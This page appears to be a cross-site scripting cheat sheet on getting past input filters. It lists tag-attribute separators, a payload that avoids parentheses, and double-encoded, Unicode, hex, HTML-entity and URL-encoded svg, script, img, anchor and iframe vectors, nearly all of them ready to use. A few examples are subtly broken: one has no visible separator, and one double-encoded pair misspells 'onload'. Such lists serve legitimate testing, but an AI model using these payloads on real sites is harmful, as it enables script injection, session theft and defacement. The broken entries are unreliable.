🔮Encoding to Bypass Restriction

Tag-attribute separators

Sometimes filters naively assume only certain characters can separate a tag and its attributes, here’s a full list of valid separators that work in firefox and chrome:

Examples

Basically, if you have a payload that looks like:

<svg onload=alert(1)>

You can try to replace the space between ‘svg’ and ‘onload’ with any of those chars and still work like you expect it to. This works for all HTML tags.

Forward slash:

<svg/onload=alert(1)><svg>

New line:

<svg
onload=alert(1)><svg>

Tab:

<svg	onload=alert(1)><svg>

New page (0xC):

<svgonload=alert(1)><svg>

---------------------------------------------------------------

ASCII Encoding Table

---------------------------------------------------------------

Vector without Parentheses, Backticks or Entities

Use as alternative to alert(1), alert1 or HTML Entities versions of those.

--------------------------------------------------------------------
<svg onload=innerHTML='\74img\11src\11onerror\75alert\501\51\76'>
<svg onload=outerHTML='\74img\11src\11onerror\75alert\501\51\76'>
--------------------------------------------------------------------

---------------------------------------------------------------

Double Encoded Vector

Use when the application performs double decoding of input.

--------------------------------------------------------------------
%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E
%2522%253E%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E
--------------------------------------------------------------------

---------------------------------------------------------------

Encoding

--------------------------------------------------------------------
Unicode:

"\u003e\u003cimg src=1 onerror=alert(0)\u003e
<script>\u0061lert(1)</script>
<script>\u{61}lert(1)</script>
<script>\u{0000000061}lert(1)</script>
--------------------------------------------------------------------
Hex:

<script>eval('\x61lert(1)')</script>
%22%3E%3Csvg%20onload=self[%27\x61\x6c\x65\x72\x74%27](%27\x5f\x59\x30\x30\x30\x21\x5f\x0a%27)%3E_Y000!_
--------------------------------------------------------------------
HTML:

<svg><script>&#97;lert(1)</script></svg>
<svg><script>&#x61;lert(1)</script></svg>
<svg><script>alert&NewLine;(1)</script></svg>
<svg><script>x="&quot;,alert(1)//";</script></svg>
\’-alert(1)//
--------------------------------------------------------------------
URL:

<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
--------------------------------------------------------------------
Double URL Encode:

%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
--------------------------------------------------------------------
Unicode + HTML:

<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
--------------------------------------------------------------------
HTML + URL:

<iframe src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>
--------------------------------------------------------------------